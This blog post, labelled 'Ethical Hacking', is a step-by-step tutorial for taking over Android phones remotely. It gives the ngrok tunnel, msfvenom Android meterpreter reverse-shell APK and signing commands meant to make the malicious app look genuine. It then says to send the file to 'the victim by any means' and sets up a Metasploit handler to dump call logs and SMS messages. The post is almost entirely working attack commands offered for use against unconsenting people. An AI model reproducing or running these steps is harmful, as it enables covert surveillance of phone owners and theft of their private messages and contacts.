Ethical Hacking

Hacking any Android Phone in the world

Hacking any Android Phone in the world

Hello Hackers,

Let’s read some Cybersecurity Blogs,

Today we will learn how to hack any Android Phone, this blog is not unique because there as tons of blogs on this, but but but guys the uniqueness of this blog is we are going to exploit this over the web(anywhere in the world) and rest of the blogs has shown exploiting it over the same network.

Very First we need to start a ngrok server to access the reverse shell over the web, its acts like a tunnel.

I have started NGROK SEVER on the port number 4444.

ngrok tcp 4444

Now it’s time to make a payload for android devices, the payload extension will be “apk” and we are going to use Msfvenom(it is used to generate a payload of any kind).

msfvenom -p android/meterpreter/reverse_tcp LHOST=<yours> LPORT=<yours> R > filename.apk

We have to use the ngrok server in place of LHOST and LPORT

Now to make the app genuine not a fake app or malicious app we will be going to allocate a certificate to the application using Keytool“, “Jarsigner” and “Zipalign.

keytool -genkey -V -keystore key.keystore -alias vulndetox -keylag RSA -keystore 2048 -validity 10000

Next is to use “Jarsigner“(To sign Java Archive (JAR) files. To verify the signatures and integrity of signed JAR files)…

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore <apk_file> vulndetox
jarsigner -verify -verbose -certs <apk_file>

Now we have to use Zipalign(It is an archive alignment tool that provides important optimization to Android application (. apk) files)…

zipalign -v 4 <apk_file> <new_apk_file_to_be_named>

Now send the file to the victim by any means and the victim should download the file and that will fulfill your needs.

Now it’s time to start Metasploitusing the command msfconsole.

1. use exploit/multi/handler
2. set payload android/meterpreter/reverse_tcp
3. set lhost
4. set lport 4444 (used for ngrok)
5. run

Now when victim clicks on the app you will recieve a reverse connection from android device…

Once we got the reverse connection we will able to do any thing like dump callogs,sms,contact_list etc…

use command sysinfo to check the system information

Now we will use command dump_calllog and dump_sms“.

It has been saved to your system, let’s access this…

This is SMS…

That’s all for the day…

HOpe you enjoyed reading it…

Happy Hacking!!!

Share this post

About the author

Leave a Reply

Your email address will not be published. Required fields are marked *